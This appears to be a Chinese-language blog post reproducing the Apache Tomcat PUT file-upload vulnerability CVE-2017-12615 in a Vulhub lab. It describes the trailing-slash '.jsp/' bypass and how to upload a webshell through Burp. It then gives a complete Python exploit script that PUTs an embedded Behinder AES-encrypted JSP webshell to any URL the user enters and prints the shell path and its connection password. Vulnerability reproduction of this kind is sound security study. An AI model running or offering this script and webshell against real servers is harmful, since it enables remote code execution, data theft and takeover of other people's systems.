【漏洞复现】Tomcat 任意写入文件漏洞(CVE-2017-12615)

一、漏洞描述

Apache Tomcat 7.0.0到7.0.79版本中存在远程代码执行漏洞,当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法时,攻击者可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件,文件中的代码被服务器执行。

二、影响版本

Apache Tomcat >=7.0.0,<=7.0.79

三、漏洞利用

漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为false) , 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器执 行, 导致服务器上的数据泄露或获取服务器权限。

由于conf/web.xml的readonly参数的设置为false,意思为开启PUT方法,默认情况下是禁止PUT和DELETE方法的

搭建tomcat,使用vulfous靶场本地拉取docker。打开后用burp抓包

将GET方法改为PUT方法,路径后改为/1.jsp/,使用冰蝎提供的木马或者一句话木马,切记文件名后加斜杠绕过,返回201状态码(代表已经创建)

介绍八种请求方式:

HTTP/1.1协议中共定义了八种方法,来表明Request-URL指定的资源不同的操作方式。HTTP/1.0定义了三种请求方法:GET、POST、和HEAD方法HTTP/1.1新增了五种方法:OPTIONS,PUT,CONNECT,DELETE和TRACE方法。

冰蝎连接,成功连接,找到flag

四、脚本

import requests
import sys
import time

#rebeyond
def attack(url):
   user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
   headers={"User-Agent":user_agent}
   data="""<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
   <%!class U extends ClassLoader{U(ClassLoader c){
      super(c);
   }public Class g(byte []b){
   return super.defineClass(b,0,b.length);
   }
   }%>
   <%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";
   session.putValue("u",k);
   Cipher c=Cipher.getInstance("AES");
   c.init(2,new SecretKeySpec(k.getBytes(),"AES"));
   new U(this.getClass().getClassLoader()).g(c.doFinal(Base64.getDecoder().decode(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
   """
   try:
      requests.put(url, headers=headers, data=data)

      time.sleep(2)

      response = requests.get(url[:-1], headers=headers)
      if response.status_code == 200:
         print ('success!')
      else :
         print (response.status_code)

   except :
      print("error")

if __name__ == '__main__':
    url=input("输入url:")
    file=input("文件名:")
    target_url = url+ '/'+file+'.jsp/'
    attack(target_url)
    print('shell: ' + target_url[:-1])
    print('冰蝎连接密码:rebeyond ')

运行:

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Edward Hopper

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值